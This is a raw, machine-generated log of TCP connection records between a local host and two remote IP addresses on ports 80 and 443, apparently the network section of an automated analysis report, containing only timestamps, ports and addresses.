Aug 10, 2024 16:12:24.397087097 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.397090912 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.397105932 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.397119045 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.397125959 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.397217989 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.397257090 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.397270918 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.397285938 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.397300959 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.397309065 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.397315979 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.397330046 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.397331953 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.397345066 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.397352934 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.397357941 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.397372007 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.397377014 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.397386074 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.397398949 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.397403002 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.397416115 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.397424936 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.397432089 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.397433996 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.397447109 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.397459030 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.397470951 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.397480011 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.400417089 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.400433064 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.400445938 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.400460005 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.400474072 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.400505066 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.400505066 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.400506020 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.400521040 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.400532961 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.400537014 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.400557041 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.400598049 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.400598049 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.400736094 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.400794983 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.400811911 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.400876045 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.400891066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.400904894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.400914907 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.400914907 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.400914907 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.400919914 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.400974035 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.400974035 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.401072025 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401086092 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401098967 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401123047 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.401123047 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.401139021 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401153088 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401165962 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401180983 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401185989 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.401196957 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401217937 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.401217937 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.401241064 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401254892 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401268005 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401341915 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401355982 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401370049 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401384115 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401397943 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401421070 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.401421070 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.401421070 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.401421070 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.401434898 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.401457071 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401480913 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401494980 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401508093 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401523113 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401537895 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401545048 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.401545048 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.401545048 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.401556015 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401566982 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.401567936 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401654959 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401668072 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401681900 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401698112 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401698112 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.401698112 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.401698112 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.401721001 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401735067 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401747942 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401756048 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.401756048 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.401756048 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.401806116 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.401806116 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.401938915 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.401952028 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402017117 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.402019978 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402034998 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402048111 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402061939 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402076960 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402089119 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402095079 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.402095079 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.402113914 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.402113914 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402127028 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402141094 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402154922 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402168036 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402182102 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.402182102 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.402182102 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.402182102 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.402183056 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402192116 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.402201891 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402205944 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.402215004 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402229071 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402242899 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402257919 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402265072 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.402265072 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.402265072 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.402265072 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.402271032 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402292013 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.402292013 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.402295113 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402304888 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.402308941 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402324915 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402338982 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402380943 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.402380943 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.402381897 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.402381897 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.402601004 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402623892 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402637959 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402652025 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402666092 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402681112 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402694941 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402740955 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.402740955 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.402740955 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.402740955 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.402905941 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402920008 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402935982 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.402978897 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.403012037 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.403027058 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.403039932 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.403053999 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.403068066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.403081894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.403098106 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.403127909 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.403127909 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.403127909 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.403127909 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.403162956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.403167963 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.403261900 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.403276920 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.403294086 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.403316975 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.403331041 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.403345108 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.403356075 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.403369904 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.403383970 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.403392076 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.403392076 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.403392076 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.403392076 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.403409958 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.403424025 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.403436899 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.403466940 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.403466940 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.403556108 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.403830051 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.403924942 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.403939962 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.403969049 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.404009104 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.404023886 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.404036999 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.404055119 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.404062986 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.404062986 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.404062986 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.404077053 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.404160976 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.404174089 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.404186964 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.404200077 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.404200077 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.404200077 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.404200077 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.404201031 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.404216051 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.404216051 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.404236078 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.404239893 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.404253006 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.404300928 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.404300928 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.404300928 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.404300928 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.404531002 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.404545069 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.404568911 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.404582024 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.404597044 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.404611111 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.404625893 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.404640913 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.404653072 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.404653072 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.404653072 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.404653072 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.404810905 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.449033976 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.449047089 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.449100971 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.449106932 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.449359894 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.451128006 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.451179981 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.451230049 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.451261044 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.451287985 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.451293945 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.451322079 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.451325893 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.451359987 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.451364040 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.453891039 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.473644972 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.473666906 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.473845005 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.473856926 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.473948956 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.473964930 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.474030018 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.474030018 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.474035978 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.474097967 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.474394083 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.474412918 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.474509954 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.474514961 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.474678040 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.474823952 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.474836111 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.474888086 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.474895000 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.475305080 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.475317955 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.475323915 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.475337982 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.475411892 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.475411892 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.476604939 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.476619959 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.476670980 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.476675034 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.477041960 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.477055073 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.477128029 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.477132082 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.478935003 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.480573893 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.480623960 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.480644941 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.480690956 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.480696917 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.480727911 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.480736017 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.480777025 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.480787992 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.480808020 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.480825901 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.480839968 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.480864048 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.480870008 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.480910063 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.480921030 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.480954885 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.480969906 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.480988026 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.481019020 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.481020927 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.481066942 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.481067896 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.481098890 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.481131077 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.481158972 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.481163025 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.481195927 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.481209040 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.481230021 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.481260061 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.481262922 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.481281996 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.481292963 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.481323957 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.481324911 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.481333971 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.481357098 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.481367111 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.481389046 CEST	80	49739	147.45.44.104	192.168.2.4
